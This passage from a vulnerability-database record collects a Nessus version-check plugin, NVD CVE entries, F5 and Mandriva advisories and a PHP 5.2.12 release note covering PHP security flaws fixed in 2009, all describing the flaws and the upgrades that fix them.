(Bug #49687)\n\n - 'proc_open()' can bypass 'safe_mode_protected_env_vars'.\n (Bug #49026)", "edition": 25, "published": "2009-09-18T00:00:00", "title": "PHP < 5.2.11 Multiple Vulnerabilities", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-4018", "CVE-2009-3292", "CVE-2009-5016", "CVE-2009-3291", "CVE-2009-3293", "CVE-2009-3294"], "modified": "2021-01-02T00:00:00", "cpe": ["cpe:/a:php:php"], "id": "PHP_5_2_11.NASL", "href": "https://www.tenable.com/plugins/nessus/41014", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(41014);\n script_version(\"1.18\");\n script_cvs_date(\"Date: 2018/07/24 18:56:10\");\n\n script_cve_id(\n \"CVE-2009-3291\",\n \"CVE-2009-3292\",\n \"CVE-2009-3293\",\n \"CVE-2009-3294\",\n \"CVE-2009-4018\",\n \"CVE-2009-5016\"\n );\n script_bugtraq_id(36449, 44889);\n script_xref(name:\"Secunia\", value:\"36791\");\n\n script_name(english:\"PHP < 5.2.11 Multiple Vulnerabilities\");\n script_summary(english:\"Checks version of PHP\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\n\"The remote web server uses a version of PHP that is affected by\nmultiple flaws.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"According to its banner, the version of PHP installed on the remote\nhost is older than 5.2.11. Such versions may be affected by several\nsecurity issues :\n\n - An unspecified error occurs in certificate validation\n inside 'php_openssl_apply_verification_policy'.\n\n - An unspecified input validation vulnerability affects\n the color index in 'imagecolortransparent()'.\n\n - An unspecified input validation vulnerability affects\n exif processing.\n\n - Calling 'popen()' with an invalid mode can cause a\n crash under Windows. 
(Bug #44683)\n\n - An integer overflow in 'xml_utf8_decode()' can make it\n easier to bypass cross-site scripting and SQL injection \n protection mechanisms using a specially crafted string \n with a long UTF-8 encoding. (Bug #49687)\n\n - 'proc_open()' can bypass 'safe_mode_protected_env_vars'.\n (Bug #49026)\"\n );\n\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.php.net/ChangeLog-5.php#5.2.11\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.php.net/releases/5_2_11.php\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://news.php.net/php.internals/45597\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.php.net/ChangeLog-5.php#5.2.11\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\"Upgrade to PHP version 5.2.11 or later.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No exploit is required\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n script_cwe_id(20, 134, 264);\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/09/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/09/18\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:php:php\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2009-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"php_version.nasl\");\n script_require_ports(\"Services/www\", 80);\n script_require_keys(\"www/PHP\");\n 
exit(0);\n}\n\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"audit.inc\");\ninclude(\"webapp_func.inc\");\n\nport = get_http_port(default:80, php:TRUE);\n\nphp = get_php_from_kb(\n port : port,\n exit_on_fail : TRUE\n);\n\nversion = php[\"ver\"];\nsource = php[\"src\"];\n\nbackported = get_kb_item('www/php/'+port+'/'+version+'/backported');\n\nif (report_paranoia < 2 && backported)\n audit(AUDIT_BACKPORT_SERVICE, port, \"PHP \"+version+\" install\");\n\nif (version =~ \"^[0-4]\\.\" || \n version =~ \"^5\\.[01]\\.\" || \n version =~ \"^5\\.2\\.([0-9]|10)($|[^0-9])\"\n)\n{\n if (report_verbosity > 0)\n {\n report =\n '\\n Version source : '+source +\n '\\n Installed version : '+version+\n '\\n Fixed version : 5.2.11\\n';\n security_hole(port:port, extra:report);\n }\n else security_hole(port);\n exit(0);\n}\nelse audit(AUDIT_LISTEN_NOT_VULN, \"PHP\", port, version);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "cve": [{"lastseen": "2020-10-03T11:51:06", "description": "The dba_replace function in PHP 5.2.6 and 4.x allows context-dependent attackers to cause a denial of service (file truncation) via a key with the NULL byte. 
NOTE: this might only be a vulnerability in limited circumstances in which the attacker can modify or add database entries but does not have permissions to truncate the file.", "edition": 3, "cvss3": {}, "published": "2009-08-25T10:30:00", "title": "CVE-2008-7068", "type": "cve", "cwe": ["CWE-20"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.4, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 4.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2008-7068"], "modified": "2018-10-30T16:26:00", "id": "CVE-2008-7068", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-7068", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:P"}},
{"lastseen": "2020-12-09T19:31:23", "description": "The proc_open function in ext/standard/proc_open.c in PHP before 5.2.11 and 5.3.x before 5.3.1 does not enforce the (1) safe_mode_allowed_env_vars and (2) safe_mode_protected_env_vars directives, which allows context-dependent attackers to execute programs with an arbitrary environment via the env parameter, as demonstrated by a crafted value of the LD_LIBRARY_PATH environment variable.", "edition": 5, "cvss3": {}, "published": "2009-11-29T13:07:00", "title": "CVE-2009-4018", "type": "cve", "cwe": ["CWE-264"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2009-4018"], "modified": "2018-10-30T16:26:00", "id": "CVE-2009-4018", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-4018", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}},
{"lastseen": "2020-10-03T11:54:19", "description": "PHP before 5.2.12 and 5.3.x before 5.3.1 does not restrict the number of temporary files created when handling a multipart/form-data POST request, which allows remote attackers to cause a denial of service (resource exhaustion), and makes it easier for remote attackers to exploit local file inclusion vulnerabilities, via multiple requests, related to lack of support for the max_file_uploads directive.", "edition": 3, "cvss3": {}, "published": "2009-11-24T00:30:00", "title": "CVE-2009-4017", "type": "cve", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2009-4017"], "modified": "2018-10-10T19:48:00", "cpe": ["cpe:/a:php:php:5.2.11", "cpe:/a:php:php:5.3.0"], "id": "CVE-2009-4017", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-4017", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}, "cpe23": ["cpe:2.3:a:php:php:5.2.11:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.3.0:*:*:*:*:*:*:*"]}, {"lastseen": "2020-12-09T19:31:22", "description": "Unspecified vulnerability in PHP before 5.2.11, and 5.3.x before 5.3.1, has unknown impact and attack vectors related to \"missing sanity checks around 
exif processing.\"", "edition": 5, "cvss3": {}, "published": "2009-09-22T10:30:00", "title": "CVE-2009-3292", "type": "cve", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2009-3292"], "modified": "2018-10-30T16:26:00", "id": "CVE-2009-3292", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-3292", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}},
{"lastseen": "2020-12-09T19:31:22", "description": "The php_openssl_apply_verification_policy function in PHP before 5.2.11 does not properly perform certificate validation, which has unknown impact and attack vectors, probably related to an ability to spoof certificates.", "edition": 5, "cvss3": {}, "published": "2009-09-22T10:30:00", "title": "CVE-2009-3291", "type": "cve", "cwe": ["CWE-20"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", 
"exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": true, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2009-3291"], "modified": "2018-10-30T16:26:00", "id": "CVE-2009-3291", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-3291", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}},
{"lastseen": "2020-12-09T19:31:22", "description": "The posix_mkfifo function in ext/posix/posix.c in PHP before 5.2.12 and 5.3.x before 5.3.1 allows context-dependent attackers to bypass open_basedir restrictions, and create FIFO files, via the pathname and mode arguments, as demonstrated by creating a .htaccess file.\nAccess Complexity selected medium according to the information from X-force link regarding enabling \"open_basedir\" option.\r\n\r\nhttp://xforce.iss.net/xforce/xfdb/53568\r\n\r\n\r\n", 
"edition": 5, "cvss3": {}, "published": "2009-11-23T17:30:00", "title": "CVE-2009-3558", "type": "cve", "cwe": ["CWE-264"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2009-3558"], "modified": "2018-10-30T16:26:00", "id": "CVE-2009-3558", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-3558", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}},
{"lastseen": "2020-12-09T19:31:22", "description": "The tempnam function in ext/standard/file.c in PHP before 5.2.12 and 5.3.x before 5.3.1 allows context-dependent attackers to bypass safe_mode restrictions, and create files in group-writable or world-writable directories, via the dir and prefix arguments.", "edition": 5, "cvss3": {}, "published": "2009-11-23T17:30:00", "title": "CVE-2009-3557", "type": "cve", "cwe": ["CWE-264"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2009-3557"], "modified": "2018-10-30T16:26:00", "id": "CVE-2009-3557", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-3557", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}], "f5": 
[{"lastseen": "2017-10-12T02:11:20", "bulletinFamily": "software", "cvelist": ["CVE-2009-4017"], "edition": 1, "description": "Prior to PHP 5.2.12, and in the 5.3.x branch prior to 5.3.1, the scripting language does not restrict the number of temporary files created when handling a multipart/form-data POST request, which allows remote attackers to cause a denial-of-service (resource exhaustion), and makes it easier for remote attackers to exploit local file inclusion vulnerabilities, through multiple requests, related to lack of support for the **max_file_uploads** directive.\n\nImpact\n\nDenial-of-service (resource exhaustion of inodes and disk space).\n\nNone\n\n * <http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-4017>\n\n**Note**: This link will take you to a resource outside of AskF5, and it is possible that the document may be removed without our knowledge.\n\n * [K9970: Subscribing to email notifications regarding F5 products](<https://support.f5.com/csp/article/K9970>)\n * [K9957: Creating a custom RSS feed to view new and updated documents](<https://support.f5.com/csp/article/K9957>)\n * [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>)\n * [K167: Downloading software and firmware from F5](<https://support.f5.com/csp/article/K167>)\n * [K10322: FirePass hotfix matrix](<https://support.f5.com/csp/article/K10322>)\n * [K3430: Installing FirePass hotfixes](<https://support.f5.com/csp/article/K3430>)\n", "modified": "2016-01-09T02:25:00", "published": "2012-01-13T23:48:00", "id": "F5:K13279", "href": "https://support.f5.com/csp/article/K13279", "title": "PHP vulnerability CVE-2009-4017", "type": "f5", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2016-09-26T17:22:51", "bulletinFamily": "software", "cvelist": ["CVE-2009-4017"], "edition": 1, "description": "Recommended Action\n\nNone\n\nSupplemental Information\n\n * 
<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-4017>\n\n**Note**: This link will take you to a resource outside of AskF5, and it is possible that the document may be removed without our knowledge.\n\n * SOL9970: Subscribing to email notifications regarding F5 products\n * SOL9957: Creating a custom RSS feed to view new and updated documents\n * SOL4602: Overview of the F5 security vulnerability response policy\n * SOL167: Downloading software and firmware from F5\n * SOL10322: FirePass hotfix matrix\n * SOL3430: Installing FirePass hotfixes\n", "modified": "2013-09-11T00:00:00", "published": "2012-01-13T00:00:00", "href": "http://support.f5.com/kb/en-us/solutions/public/13000/200/sol13279.html", "id": "SOL13279", "title": "SOL13279 - PHP vulnerability CVE-2009-4017", "type": "f5", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2017-06-08T02:18:12", "bulletinFamily": "software", "cvelist": ["CVE-2009-4017"], "edition": 1, "description": "\nF5 Product Development has assigned ID 383337 (FirePass) to this vulnerability. 
To find out whether F5 has determined that your release is vulnerable, and to obtain information about releases or hotfixes that resolve the vulnerability, refer to the following table:\n\nProduct| Versions known \nto be vulnerable| Versions known \nto be not vulnerable| Vulnerable component \nor feature \n---|---|---|--- \nBIG-IP LTM| None| 9.x \n10.x \n11.x| None \nBIG-IP GTM| None| 9.x \n10.x \n11.x| None \nBIG-IP ASM| None| 9.x \n10.x \n11.x| None \nBIG-IP Link Controller| None| 9.x \n10.x \n11.x| None \nBIG-IP WebAccelerator| None| 9.x \n10.x \n11.x| None \nBIG-IP PSM| None| 9.x \n10.x \n11.x| None \nBIG-IP WOM| None| 10.x \n11.x| None \nBIG-IP APM| None| 10.x \n11.x| None \nBIG-IP Edge Gateway| None| 10.x \n11.x| None \nBIG-IP Analytics| None| 11.x| None \nBIG-IP AFM| None| 11.x| None \nBIG-IP PEM| None| 11.x| None \nBIG-IP AAM| None| 11.x| None \nFirePass| 6.0.0 - 6.1.0 \n7.0.0| 6.1.0 HF-610-9 \n7.0.0 HF-70-7| Active user sessions \nEnterprise Manager| None| 1.x \n2.x \n3.x| None \nARX| None| 4.x \n5.x \n6.x| None\n\nUpgrade FirePass to the latest hotfix.\n\nF5 would like to acknowledge Aung Khant of YGN Ethical Hacker Group, Myanmar for bringing this issue to our attention, and for following the highest standards of responsible disclosure.\n\n * [K9970: Subscribing to email notifications regarding F5 products](<https://support.f5.com/csp/article/K9970>)\n * [K9957: Creating a custom RSS feed to view new and updated documents](<https://support.f5.com/csp/article/K9957>)\n * [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>)\n * [K167: Downloading software and firmware from F5](<https://support.f5.com/csp/article/K167>)\n * [K10322: FirePass hotfix matrix](<https://support.f5.com/csp/article/K10322>)\n * [K3430: Installing FirePass hotfixes](<https://support.f5.com/csp/article/K3430>)\n", "modified": "2017-03-14T22:15:00", "published": "2012-11-03T02:18:00", "href": 
"https://support.f5.com/csp/article/K13993", "id": "F5:K13993", "type": "f5", "title": "Cross-site URL redirection attack vulnerability CVE-2009-4017", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2016-09-26T17:23:00", "bulletinFamily": "software", "cvelist": ["CVE-2009-4017"], "edition": 1, "description": "Vulnerability Recommended Actions\n\nUpgrade FirePass to the latest hotfix.\n\nAcknowledgements\n\nF5 would like to acknowledge Aung Khant of YGN Ethical Hacker Group, Myanmar for bringing this issue to our attention, and for following the highest standards of responsible disclosure.\n\nSupplemental Information\n\n * SOL9970: Subscribing to email notifications regarding F5 products\n * SOL9957: Creating a custom RSS feed to view new and updated documents\n * SOL4602: Overview of the F5 security vulnerability response policy\n * SOL167: Downloading software and firmware from F5\n * SOL10322: FirePass hotfix matrix\n * SOL3430: Installing FirePass hotfixes\n", "modified": "2016-07-25T00:00:00", "published": "2012-11-02T00:00:00", "href": "http://support.f5.com/kb/en-us/solutions/public/13000/900/sol13993.html", "id": "SOL13993", "title": "SOL13993 - Cross-site URL redirection attack vulnerability CVE-2009-4017", "type": "f5", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}], "securityvulns": [{"lastseen": "2018-08-31T11:10:32", "bulletinFamily": "software", "cvelist": ["CVE-2009-3558", "CVE-2009-3292", "CVE-2009-3559", "CVE-2009-3557"], "description": "-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\n _______________________________________________________________________\r\n\r\n Mandriva Linux Security Advisory MDVSA-2009:302\r\n http://www.mandriva.com/security/\r\n _______________________________________________________________________\r\n\r\n Package : php\r\n Date : November 21, 2009\r\n Affected: 2010.0\r\n 
_______________________________________________________________________\r\n\r\n Problem Description:\r\n\r\n Some vulnerabilities were discovered and corrected in php-5.3.1:\r\n \r\n - Added max_file_uploads INI directive, which can be set to limit\r\n the number of file uploads per-request to 20 by default, to prevent\r\n possible DOS via temporary file exhaustion. (Ilia)\r\n - Added missing sanity checks around exif processing. (CVE-2009-3292,\r\n Ilia)\r\n - Fixed a safe_mode bypass in tempnam() identified by Grzegorz\r\n Stachowiak. (CVE-2009-3557, Rasmus)\r\n - Fixed a open_basedir bypass in posix_mkfifo() identified by Grzegorz\r\n Stachowiak. (CVE-2009-3558, Rasmus)\r\n - Fixed bug #50063 (safe_mode_include_dir fails). (CVE-2009-3559,\r\n Johannes, christian at elmerot dot se)\r\n \r\n Additionally, some packages which require so, have been rebuilt and\r\n are being provided as updates.\r\n _______________________________________________________________________\r\n\r\n References:\r\n\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3292\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3557\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3558\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3559\r\n http://news.php.net/php.announce/79\r\n _______________________________________________________________________\r\n\r\n Updated Packages:\r\n\r\n Mandriva Linux 2010.0:\r\n\r\n Mandriva Linux 2010.0/X86_64:\r\n _______________________________________________________________________\r\n\r\n To upgrade automatically use MandrivaUpdate or urpmi. The verification\r\n of md5 checksums and GPG signatures is performed automatically for you.\r\n\r\n All packages are signed by Mandriva for security. 
You can obtain the\r\n GPG public key of the Mandriva Security Team by executing:\r\n\r\n gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98\r\n\r\n You can view other update advisories for Mandriva Linux at:\r\n\r\n http://www.mandriva.com/security/advisories\r\n\r\n If you want to report vulnerabilities, please contact\r\n\r\n security_(at)_mandriva.com\r\n _______________________________________________________________________\r\n\r\n Type Bits/KeyID Date User ID\r\n pub 1024D/22458A98 2000-07-10 Mandriva Security Team\r\n <security*mandriva.com>\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.9 (GNU/Linux)\r\n\r\niD8DBQFLB+YrmqjQ0CJFipgRArVWAJ9Ny8ZN4QnvNPoQzQLpOVkuwl0/vgCg0ol8\r\nXHw/IdAmerft9IcV0iMm2o0=\r\n=aptB\r\n-----END PGP SIGNATURE-----\r\n", "edition": 1, "modified": "2009-11-24T00:00:00", "published": "2009-11-24T00:00:00", "id": "SECURITYVULNS:DOC:22822", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:22822", "title": "[ MDVSA-2009:302 ] php", "type": "securityvulns", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:10:32", "bulletinFamily": "software", "cvelist": ["CVE-2009-3558", "CVE-2009-4142", "CVE-2009-4017", "CVE-2009-4143", "CVE-2009-3557"], "description": "\r\nPHP 5.2.12 Release Announcement\r\n\r\nThe PHP development team would like to announce the immediate availability of PHP 5.2.12. This release focuses on improving the stability of the PHP 5.2.x branch with over 60 bug fixes, some of which are security related. All users of PHP 5.2 are encouraged to upgrade to this release.\r\n\r\nSecurity Enhancements and Fixes in PHP 5.2.12:\r\n\r\n * Fixed a safe_mode bypass in tempnam() identified by Grzegorz Stachowiak. (CVE-2009-3557, Rasmus)\r\n * Fixed a open_basedir bypass in posix_mkfifo() identified by Grzegorz Stachowiak. 
(CVE-2009-3558, Rasmus)\r\n * Added "max_file_uploads" INI directive, which can be set to limit the number of file uploads per-request to 20 by default, to prevent possible DOS via temporary file exhaustion, identified by Bogdan Calin. (CVE-2009-4017, Ilia)\r\n * Added protection for $_SESSION from interrupt corruption and improved "session.save_path" check, identified by Stefan Esser. (CVE-2009-4143, Stas)\r\n * Fixed bug #49785 (insufficient input string validation of htmlspecialchars()). (CVE-2009-4142, Moriyoshi, hello at iwamot dot com)\r\n\r\nKey enhancements in PHP 5.2.12 include:\r\n\r\n * Fixed unnecessary invocation of setitimer when timeouts have been disabled. (Arvind Srinivasan)\r\n * Fixed crash in com_print_typeinfo when an invalid typelib is given. (Pierre)\r\n * Fixed crash in SQLiteDatabase::ArrayQuery() and SQLiteDatabase::SingleQuery() when calling using Reflection. (Felipe)\r\n * Fixed crash when instantiating PDORow and PDOStatement through Reflection. (Felipe)\r\n * Fixed memory leak in openssl_pkcs12_export_to_file(). (Felipe)\r\n * Fixed bug #50207 (segmentation fault when concatenating very large strings on 64bit linux). (Ilia)\r\n * Fixed bug #50162 (Memory leak when fetching timestamp column from Oracle database). (Felipe)\r\n * Fixed bug #50006 (Segfault caused by uksort()). (Felipe)\r\n * Fixed bug #50005 (Throwing through Reflection modified Exception object makes segmentation fault). (Felipe)\r\n * Fixed bug #49174 (crash when extending PDOStatement and trying to set queryString property). (Felipe)\r\n * Fixed bug #49098 (mysqli segfault on error). 
(Rasmus)\r\n * Over 50 other bug fixes.\r\n\r\nFor users upgrading from PHP 5.0 and PHP 5.1, an upgrade guide is available here, detailing the changes between those releases and PHP 5.2.12.\r\n\r\nFor a full list of changes in PHP 5.2.12, see the ChangeLog.\r\n \r\n", "edition": 1, "modified": "2010-01-08T00:00:00", "published": "2010-01-08T00:00:00", "id": "SECURITYVULNS:DOC:23018", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:23018", "title": " PHP 5.2.12 Release Announcement", "type": "securityvulns", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:31", "bulletinFamily": "software", "cvelist": ["CVE-2009-3292", "CVE-2009-3291", "CVE-2009-3293"], "description": "\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\n _______________________________________________________________________\r\n\r\n Mandriva Linux Security Advisory MDVSA-2009:248\r\n http://www.mandriva.com/security/\r\n _______________________________________________________________________\r\n\r\n Package : php\r\n Date : September 25, 2009\r\n Affected: 2009.1\r\n _______________________________________________________________________\r\n\r\n Problem Description:\r\n\r\n Multiple vulnerabilities was discovered and corrected in php:\r\n \r\n The php_openssl_apply_verification_policy function in PHP before\r\n 5.2.11 does not properly perform certificate validation, which has\r\n unknown impact and attack vectors, probably related to an ability to\r\n spoof certificates (CVE-2009-3291).\r\n \r\n Unspecified vulnerability in PHP before 5.2.11 has unknown impact\r\n and attack vectors related to missing sanity checks around exif\r\n processing. (CVE-2009-3292)\r\n \r\n Unspecified vulnerability in the imagecolortransparent function in\r\n PHP before 5.2.11 has unknown impact and attack vectors related to an\r\n incorrect sanity check for the color index. (CVE-2009-3293). 
However\r\n in Mandriva we don't use the bundled libgd source in php per default,\r\n there is a unsupported package in contrib named php-gd-bundled that\r\n eventually will get updated to pickup these fixes.\r\n \r\n This update provides a solution to these vulnerabilities.\r\n _______________________________________________________________________\r\n\r\n References:\r\n\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3291\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3292\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3293\r\n _______________________________________________________________________\r\n\r\n Updated Packages:\r\n\r\n Mandriva Linux 2009.1:\r\n\r\n Mandriva Linux 2009.1/X86_64:\r\n 
2009.1/x86_64/php-sysvshm-5.2.9-6.2mdv2009.1.x86_64.rpm\r\n 6267e5a98a49282341ea3dc179924d5e 2009.1/x86_64/php-tidy-5.2.9-6.2mdv2009.1.x86_64.rpm\r\n 92acb690eb21aa10409c84ff68eef490 2009.1/x86_64/php-tokenizer-5.2.9-6.2mdv2009.1.x86_64.rpm\r\n 4525cab46df252d7599cefa4627ab0c3 2009.1/x86_64/php-wddx-5.2.9-6.2mdv2009.1.x86_64.rpm\r\n 3ba5b1bec63ba7291223826530f33e7b 2009.1/x86_64/php-xml-5.2.9-6.2mdv2009.1.x86_64.rpm\r\n 22731636ce30cf7913ca761d46730159 2009.1/x86_64/php-xmlreader-5.2.9-6.2mdv2009.1.x86_64.rpm\r\n d247b289eb6f6e88cfe17c2e7013a569 2009.1/x86_64/php-xmlrpc-5.2.9-6.2mdv2009.1.x86_64.rpm\r\n 0a00ebcb1987da46f68dc21dc007cad9 2009.1/x86_64/php-xmlwriter-5.2.9-6.2mdv2009.1.x86_64.rpm\r\n fad982207327d8e636c6f691e842755b 2009.1/x86_64/php-xsl-5.2.9-6.2mdv2009.1.x86_64.rpm\r\n bbda8f6739f36ba02e858840c5070a75 2009.1/x86_64/php-zip-5.2.9-6.2mdv2009.1.x86_64.rpm\r\n d40567ee2da7a95b876bff21b748ca3e 2009.1/x86_64/php-zlib-5.2.9-6.2mdv2009.1.x86_64.rpm \r\n 14ce077421185006aca3c756375f008b 2009.1/SRPMS/php-5.2.9-6.2mdv2009.1.src.rpm\r\n _______________________________________________________________________\r\n\r\n To upgrade automatically use MandrivaUpdate or urpmi. The verification\r\n of md5 checksums and GPG signatures is performed automatically for you.\r\n\r\n All packages are signed by Mandriva for security. 
